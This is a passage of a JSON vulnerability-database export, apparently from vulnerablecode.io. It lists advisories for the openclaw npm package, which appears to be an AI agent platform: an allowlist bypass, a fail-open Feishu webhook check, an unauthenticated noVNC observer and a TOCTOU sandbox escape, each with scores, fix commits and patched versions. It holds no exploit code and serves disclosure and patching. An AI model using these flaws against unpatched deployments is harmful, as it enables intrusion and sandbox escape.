"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41406"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-thread-history-and-quoted-messages","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-thread-history-and-quoted-messages"},{"reference_url":"https://github.com/advisories/GHSA-877v-w3f5-3pcq","reference_id":"GHSA-877v-w3f5-3pcq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_e
lements":""}],"url":"https://github.com/advisories/GHSA-877v-w3f5-3pcq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz3
3-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg6
8-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41406","GHSA-877v-w3f5-3pcq"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xryt-a83q-q7et"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90078?format=json","vulnerability_id":"VCID-xsct-xjs7-nbab","summary":"OpenClaw: Feishu webhook and card-action validation now fail closed\n## Summary\n\nFeishu webhook mode accepted missing `encryptKey` configuration as valid and blank card-action callback tokens as usable lifecycle tokens. Together, those fail-open paths could allow unauthenticated webhook or card-action traffic to reach command dispatch in affected deployments.\n\n## Impact\n\nA deployment using Feishu webhook mode without a configured `encryptKey`, or handling malformed card-action callbacks with blank callback tokens, could fail open instead of rejecting the request. Severity remains critical because affected webhook deployments expose a network-triggered path into OpenClaw command handling without the expected Feishu signature or replay protection.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` makes Feishu webhook and card-action validation fail closed. 
Webhook mode now refuses to start without an `encryptKey`, missing signing configuration returns invalid instead of valid, invalid signatures return `401`, and blank card-action callback tokens are rejected before dispatch.\n\nVerified in `v2026.4.15`:\n\n- `extensions/feishu/src/monitor.transport.ts` returns invalid when `encryptKey` is missing, refuses webhook mode without `encryptKey`, and rejects invalid signatures before JSON handling.\n- `extensions/feishu/src/card-action.ts` rejects blank callback tokens in the card-action lifecycle guard.\n- `extensions/feishu/src/monitor.webhook-security.test.ts` covers missing-`encryptKey` startup and transport rejection.\n- `extensions/feishu/src/monitor.card-action.lifecycle.test.ts` covers malformed blank-token card actions being dropped before handler dispatch.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `c8003f1b33ed2924be5f62131bd28742c5a41aae` via PR #66707\n\nThanks to @dhyabi2 for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44109","reference_id":"","reference_type":"","scores":[{"value":"0.00184","scoring_system":"epss","scoring_elements":"0.3993","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00184","scoring_system":"epss","scoring_elements":"0.39934","published_at":"2026-06-06T12:55:00Z"},{"value":"0.002","scoring_system":"epss","scoring_elements":"0.42032","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44109"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"ref
erence_url":"https://github.com/openclaw/openclaw/commit/c8003f1b33ed2924be5f62131bd28742c5a41aae","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c8003f1b33ed2924be5f62131bd28742c5a41aae"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66707","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66707"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xh72-v6v9-mwhc","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xh72-v6v9-mwhc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44109","reference_id":"","reference
_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44109"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-feishu-webhook-and-card-action-validation","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-feishu-webhook-and-card-action-validation"},{"reference_url":"https://github.com/advisories/GHSA-xh72-v6v9-mwhc","reference_id":"GHSA-xh72-v6v9-mwhc","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xh72-v6v9-mwhc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109881?format=json","purl":"pkg:npm/openclaw@2026.4.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"
VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"}],"aliases":["CVE-2026-44109","GHSA-xh72-v6v9-mwhc"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xsct-xjs7-nbab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91859?format=json","vulnerability_id":"VCID-xux6-be95-e7ec","summary":"Duplicate Advisory: OpenClaw's sandbox browser noVNC observer lacked VNC authentication\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-25gx-x37c-7pph. This link is maintained to preserve external references.\n\n## Original Description\nIn OpenClaw versions prior to 2026.2.21, the sandbox browser entrypoint launches x11vnc without authentication for noVNC observer sessions, allowing unauthenticated access to the VNC interface. 
Remote attackers on the host loopback interface can connect to the exposed noVNC port to observe or interact with the sandbox browser without credentials.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/621d8e1312482f122f18c43c72c67211b141da01","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/621d8e1312482f122f18c43c72c67211b141da01"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8c1518f0f3e0533593cd2dec3a46c9b746753661","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/8c1518f0f3e0533593cd2dec3a46c9b746753661"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-vnc-authentication-in-sandbox-browser-novnc-observer","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:
X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-vnc-authentication-in-sandbox-browser-novnc-observer"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32064","reference_id":"CVE-2026-32064","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32064"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-25gx-x37c-7pph","reference_id":"GHSA-25gx-x37c-7pph","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-25gx-x37c-7pph"},{"reference_url":"https://github.com/advisories/GHSA-cxcw-jm67-3wwp","reference_id":"GHSA-cxcw-jm67-3wwp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxcw-jm67-3wwp"}],"fixed_packages":[],"aliases":["GHSA-cxcw-jm67-3wwp"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xux6-be95-e7ec"},{"url":"http://public2.v
ulnerablecode.io/api/vulnerabilities/89722?format=json","vulnerability_id":"VCID-xvhd-w4tv-tqhr","summary":"OpenClaw: Sandbox escape via TOCTOU race in remote FS bridge readFile\n## Summary\nSandbox escape via TOCTOU race in remote FS bridge readFile\n\n## Current Maintainer Triage\n- Normalized severity: critical\n- Assessment: v2026.3.28 remote sandbox reads still do path-check then separate file read, so the TOCTOU sandbox escape remains present in the latest shipped tag.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `121870a08583033ed6a0ed73d9ffea32991252bb` — 2026-03-31T09:55:51+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41296","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10948","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10981","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.1099","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41296"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/121870a08583033ed6a0ed73d9ffea32991252bb","reference_id":"","reference_ty
pe":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/"}],"url":"https://github.com/openclaw/openclaw/commit/121870a08583033ed6a0ed73d9ffea32991252bb"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9p3r-hh9g-5cmg","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/"}],"url":"https://github.com/openc
law/openclaw/security/advisories/GHSA-9p3r-hh9g-5cmg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41296","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41296"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-toctou-race-in-remote-fs-bridge-readfile","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-toctou-race-in-remote-fs-bridge-readfile"},{"reference_url":"https://github.com/advisories/GHSA-9p3r-hh9g-5cmg","reference_id":"GHSA-9p3r-hh9g-5cmg","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9p3r-hh9g-5cmg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3y
e4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"